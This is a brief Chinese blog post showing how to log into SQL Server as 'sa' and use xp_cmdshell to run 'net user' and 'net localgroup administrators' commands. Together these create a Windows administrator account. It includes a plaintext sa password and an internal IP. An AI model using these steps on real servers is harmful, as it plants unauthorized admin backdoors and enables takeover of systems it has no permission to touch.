XP_CMDSHELL 执行命令添加 windows 用户的方法

1. 之前看过不少文档 可以使用 xp_SQLCMD的命令来进行渗透处理, 今天因为公司的服务器又中毒了 自己学习了下.

2. 修改SQLSERVER的设置

远程登录数据库
sqlcmd -S 10.24.160.71 -U sa -P Test6530

修改数据库配置:
sp_configure 'show advanced options',1
go
reconfigure
go
详细错误如图示

3. 修改sqlserver的配置 不然会报错:

修改方法 打开服务 将windows 使用的账户 修改为本地账户

4. 执行 命令添加用户

exec xp_cmdshell 'net user cmdshell Test6530 /add'

修改属主用户组

exec xp_cmdshell 'net localgroup administrators cmdshell /add'

5. 到具体的操作系统下面验证相关的操作.

 

猜你喜欢

转载自www.cnblogs.com/jinanxiaolaohu/p/10715690.html
0条评论
添加一条新回复